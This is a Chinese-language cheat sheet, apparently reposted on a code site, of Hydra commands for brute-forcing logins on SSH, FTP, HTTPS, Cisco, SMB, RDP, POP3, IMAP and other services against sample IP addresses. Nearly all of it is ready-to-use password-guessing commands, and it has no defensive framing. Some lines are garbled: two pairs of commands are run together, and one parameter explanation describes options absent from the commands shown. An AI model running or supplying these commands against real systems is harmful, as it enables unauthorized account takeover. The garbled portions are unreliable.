Hydra常用命令


知道用戶名或密碼用小寫,不知道用大寫加字典

 

破解ssh:

hydra -l root -P passwd.txt -t 10 -vV -e ns 192.168.190.136 ssh


hydra -l 用戶名 -p 密碼字典 -t 線程 -o save.log -vV ip ssh

 

破解ftp:

hydra ip ftp -l 用戶名 -P 密碼字典 -t 線程(默認16) -vV


hydra ip ftp -l 用戶名 -P 密碼字典 -e ns -vV

(參數說明:-t同時線程數3,-l用戶名是admin,字典pass.txt,保存為out.txt,-f 當破解了一個密碼就停止, 10.36.16.18目標ip,http-post-form表示破解是采用http的post方式提交的表單密碼破解,中的內容是表示錯誤猜解的返回信息提示。)

 

破解https:

hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https


破解teamspeak

 

hydra -l 用戶名 -P 密碼字典 -s 端口號 -vV ip teamspeak


破解cisco:

hydra -P pass.txt 10.36.16.18 ciscohydra -m cloud -P pass.txt 10.36.16.18 cisco-enable


破解smb:

hydra -l administrator -P pass.txt 10.36.16.18 smb


破解pop3:

hydra -l muts -P pass.txt my.pop3.mail pop3

 

 

破解rdp:

hydra ip rdp -l administrator -P pass.txt -V


破解http-proxy:

hydra -l admin -P pass.txt http-proxy://10.36.16.1


破解imap:

hydra -L user.txt -p secret 10.36.16.18 imap PLAINhydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM